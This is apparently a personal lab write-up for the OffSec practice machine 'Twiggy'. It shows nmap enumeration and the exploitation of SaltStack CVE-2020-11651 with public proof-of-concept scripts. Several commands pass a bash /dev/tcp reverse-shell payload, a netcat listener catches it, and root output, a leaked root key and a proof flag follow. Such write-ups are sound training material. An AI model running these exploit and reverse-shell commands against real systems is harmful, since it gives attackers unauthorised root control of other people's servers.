Twiggy

The document details the results of multiple Nmap scans on the IP address 192.168.241.62, revealing open ports and services including SSH, DNS, and HTTP with specific versions. It highlights potential vulnerabilities, particularly related to CSRF and ZeroMQ, and discusses the exploitation of a SaltStack authorization bypass vulnerability (CVE-2020-11651). Additionally, it includes steps for executing a Python exploit to gain root access, along with troubleshooting information for errors encountered during the process.

Uploaded by Vo Tinh

$ nmap -sC -sV -A -Pn 192.168.241.62
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-04 17:25 EST
Nmap scan report for 192.168.241.62
Host is up (0.11s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
| 256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_ 256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Home | Mezzanine
8000/tcp open http nginx 1.16.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.16.1
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/4%Time=5FA32A68%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x05\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03")%r(DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0
SF:\0\0\0\0\0\0");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.95 seconds

$ nmap -sC -sV -A -Pn -p- 192.168.241.62

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-04 17:29 EST
Nmap scan report for 192.168.241.62
Host is up (0.11s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
| 256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_ 256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Home | Mezzanine
4505/tcp open zmtp ZeroMQ ZMTP 2.0
4506/tcp open zmtp ZeroMQ ZMTP 2.0
8000/tcp open http nginx 1.16.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.16.1
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=11/4%Time=5FA32DA9%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x05\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03")%r(DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x04\0\0
SF:\0\0\0\0\0\0");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 643.56 seconds
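As an added example (not part of the original notes), the following Python decodes the two DNS-over-TCP replies that nmap captured in the SF-Port53-TCP fingerprint above. It shows why the daemon could not be identified: the CHAOS TXT query for version.bind was answered with REFUSED (the server hides its version string), and the STATUS opcode probe got NOTIMP, which matches nmap's "generic dns response: NOTIMP" label. The byte strings are copied from the fingerprint; the field names and helper functions are mine.

```python
import struct

# DNS-over-TCP replies copied from the nmap SF-Port53-TCP fingerprint above:
# a 2-byte length prefix followed by the DNS message.
VERSION_BIND_REPLY = (b"\0\x1e\0\x06\x81\x05\0\x01\0\0\0\0\0\0"
                      b"\x07version\x04bind\0\0\x10\0\x03")
STATUS_REQUEST_REPLY = b"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0"

RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
          4: "NOTIMP", 5: "REFUSED"}
OPCODES = {0: "QUERY", 1: "IQUERY", 2: "STATUS"}

def parse_name(msg, off):
    """Read an uncompressed DNS name (length-prefixed labels) at offset off."""
    labels = []
    while msg[off] != 0:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1

def decode_tcp_reply(raw):
    """Decode the header and question section of a DNS-over-TCP reply."""
    (length,) = struct.unpack("!H", raw[:2])
    msg = raw[2:2 + length]
    if len(msg) != length:
        raise ValueError("truncated DNS message")
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    reply = {
        "id": ident,
        "qr": bool(flags & 0x8000),      # set: this is a response
        "opcode": OPCODES.get((flags >> 11) & 0xF, "?"),
        "rd": bool(flags & 0x0100),      # recursion-desired bit echoed back
        "rcode": RCODES.get(flags & 0xF, "?"),
        "qdcount": qd, "ancount": an, "questions": [],
    }
    off = 12
    for _ in range(qd):               # question = name, qtype, qclass
        name, off = parse_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        reply["questions"].append((name, qtype, qclass))  # 16 = TXT, 3 = CH
    return reply

if __name__ == "__main__":
    for label, raw in (("version.bind", VERSION_BIND_REPLY),
                       ("status request", STATUS_REQUEST_REPLY)):
        r = decode_tcp_reply(raw)
        print(f"{label}: opcode={r['opcode']} rcode={r['rcode']} questions={r['questions']}")
```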

$ nmap -Pn -p- --script vuln 192.168.241.62

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-04 17:25 EST
Nmap scan report for 192.168.241.62
Host is up (0.15s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE
22/tcp open ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp open domain
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.241.62
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.241.62:80/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/gallery/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/search/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/about/history/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/blog/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/about/team/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/contact/legals/
| Form id:
| Form action: /search/
|
| Path: http://192.168.241.62:80/contact/
| Form id:
|_ Form action: /search/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /blog/: Blog
| /contact/: Potentially interesting folder
|_ /search/: Potentially interesting folder
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
4505/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
4506/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8000/tcp open http-alt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /login/:
| session_id:
| httponly flag not set
| /stats/:
| session_id:
|_ httponly flag not set
| http-enum:
| /login/: Login page
| /index/: Potentially interesting folder
|_ /stats/: Potentially interesting folder (401 Unauthorized)

Nmap done: 1 IP address (1 host up) scanned in 1400.32 seconds

@ http://192.168.241.62/
● Mezzanine powered website -> Mezzanine - The Best Django CMS ??? http://mezzanine.jupo.org/
● @ http://mezzanine.jupo.org/docs/content-architecture.html -> Mezzanine version 4.3.1

// Searchsploit found only XSS attacks -> not interesting

● Admin login page

Trying admin/admin shows the following error

@ http://192.168.241.62:8000/
// MSF search for nginx, but failed

Port 4505: ZeroMQ -> SaltStack authorization bypass
https://labs.f-secure.com/advisories/saltstack-authorization-bypass
CVE-2020-11651
https://www.exploit-db.com/exploits/48421
● https://github.com/jasperla/CVE-2020-11651-poc

// Install salt for Python 3

$ sudo apt-get install python3-venv
$ pip install distro salt

// Simply run the exploit, get some errors but still got the reverse shell as root
$ python3 CVE-2020-11651.py 192.168.139.62 master 'bash -i >& /dev/tcp/192.168.49.139/4505 0>&1'
Attempting to ping master at 192.168.139.62
Retrieved root key: ZSnsQyydnSirbxqu4FxOpLSDkBWsUtbM1/Qa/WF6TiDkZUm6WBvUIv7b02m/ufGOE+CgTf7tlZ4=
Got response for attempting master shell: {'jid': '20201119121425865758', 'tag': 'salt/run/20201119121425865758'}. Looks promising!

Exception ignored in: <function AsyncZeroMQReqChannel.__del__ at 0x7fa23a178f70>
Traceback (most recent call last):
  File "/home/kali/.local/lib/python3.8/site-packages/salt/transport/zeromq.py", line 314, in __del__
  File "/home/kali/.local/lib/python3.8/site-packages/salt/transport/zeromq.py", line 294, in close
  File "/home/kali/.local/lib/python3.8/site-packages/salt/transport/zeromq.py", line 1193, in close
  File "/home/kali/.local/lib/python3.8/site-packages/salt/transport/zeromq.py", line 1269, in close
  File "/home/kali/.local/lib/python3.8/site-packages/zmq/eventloop/zmqstream.py", line 415, in close
  File "/home/kali/.local/lib/python3.8/site-packages/salt/ext/tornado/ioloop.py", line 737, in remove_handler
  File "/home/kali/.local/lib/python3.8/site-packages/salt/ext/tornado/ioloop.py", line 659, in split_fd
  File "/home/kali/.local/lib/python3.8/site-packages/zmq/sugar/socket.py", line 181, in fileno
  File "/home/kali/.local/lib/python3.8/site-packages/zmq/sugar/attrsettr.py", line 48, in __getattr__
ImportError: sys.meta_path is None, Python is likely shutting down
===================================================
Follow the steps in the walkthrough

$ . ./env/bin/activate
$ pip install distro salt

$ sed -i 's/from platform import _supported_dists//' ./env/lib/python3.8/site-packages/salt/grains/core.py
$ sed -i 's/_supported_dists +=/_supported_dists =/' ./env/lib/python3.8/site-packages/salt/grains/core.py

// Run the script (get the same errors)

$ python3 CVE-2020-11651.py 192.168.139.62 master 'bash -i >& /dev/tcp/192.168.49.139/4505 0>&1'
Attempting to ping master at 192.168.139.62
Retrieved root key: ZSnsQyydnSirbxqu4FxOpLSDkBWsUtbM1/Qa/WF6TiDkZUm6WBvUIv7b02m/ufGOE+CgTf7tlZ4=
Got response for attempting master shell: {'jid': '20201119120355646732', 'tag': 'salt/run/20201119120355646732'}. Looks promising!
Exception ignored in: <function AsyncZeroMQReqChannel.__del__ at 0x7f9a111f38b0>
Traceback (most recent call last):
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/transport/zeromq.py", line 314, in __del__
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/transport/zeromq.py", line 294, in close
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/transport/zeromq.py", line 1193, in close
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/transport/zeromq.py", line 1269, in close
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/zmq/eventloop/zmqstream.py", line 415, in close
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/ext/tornado/ioloop.py", line 737, in remove_handler
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/salt/ext/tornado/ioloop.py", line 659, in split_fd
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/zmq/sugar/socket.py", line 256, in fileno
  File "/home/kali/OffSec/Practice/Twiggy/env/lib/python3.8/site-packages/zmq/sugar/attrsettr.py", line 48, in __getattr__
ImportError: sys.meta_path is None, Python is likely shutting down

// Even though the python script prints the errors above, after waiting about a minute we still get the reverse shell as root
(??? How to fix the exploit to remove errors ???)
Proof.txt: 4dbda8d231f2cc3ff4768dd1448f6df1

// Try the script exploit.py from https://github.com/jasperla/CVE-2020-11651-poc

It works without any errors :)
-> Get the same results: Root key and scheduled job
-> Then execute the reverse command

- Usage:
exploit.py [-h] [--master MASTER_IP] [--port MASTER_PORT] [--force] [--debug] [--run-checks] [--read READ_FILE] [--upload-src UPLOAD_SRC] [--upload-dest UPLOAD_DEST] [--exec EXEC] [--exec-all EXEC_ALL]

$ python3 exploit.py --master 192.168.139.62 --exec 'bash -i >& /dev/tcp/192.168.49.139/4505 0>&1'
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Checking salt-master (192.168.139.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: ZSnsQyydnSirbxqu4FxOpLSDkBWsUtbM1/Qa/WF6TiDkZUm6WBvUIv7b02m/ufGOE+CgTf7tlZ4=
[+] Attemping to execute bash -i >& /dev/tcp/192.168.49.139/4505 0>&1 on 192.168.139.62
[+] Successfully scheduled job: 20201119123901934549

Walkthrough by OffSec
Exploitation Guide for Twiggy
Service Enumeration

Nmap scan report for 192.168.83.220
Host is up (0.0011s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
4505/tcp open unknown
4506/tcp open unknown
8000/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 105.30 seconds

Root Shell
Download and configure the exploit
https://github.com/dozernz/cve-2020-11651
Some tweaks are required as Salt doesn’t support Python 3.8 and Kali won’t let you install packages under Python 3.7.

python3 -m venv env
. ./env/bin/activate
pip install distro salt
sed -i 's/from platform import _supported_dists//' ./env/lib/python3.8/site-packages/salt/grains/core.py
sed -i 's/_supported_dists +=/_supported_dists =/' ./env/lib/python3.8/site-packages/salt/grains/core.py

Start a Netcat handler

nc -lvp 4505

Run the exploit

(env) dylan@kali:~/machines/twiggy$ python3 exploit.py 192.168.83.220 master 'bash -i >& /dev/tcp/192.168.83.219/4505 0>&1'
/home/dylan/machines/twiggy/env/lib/python3.8/site-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated since Python 3.3, and in 3.9 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.83.220
Retrieved root key: 8tnPuz4Fk+nH4c2CVW3/1BBbWofubqMZGJ1gkEkiB6WzlnyqQ7muDw3dbtKNwTMjUU6IcNFD9VY=
Got response for attempting master shell: {'jid': '20200518074808085260', 'tag': 'salt/run/20200518074808085260'}. Looks promising!

Wait a minute and catch the shell

dylan@kali:~$ nc -lvp 4505
listening on [any] 4505 ...
192.168.83.220: inverse host lookup failed: Unknown host
connect to [192.168.83.219] from (UNKNOWN) [192.168.83.220] 33584
bash: no job control in this shell
[root@localhost root]# id
id
uid=0(root) gid=0(root) groups=0(root)
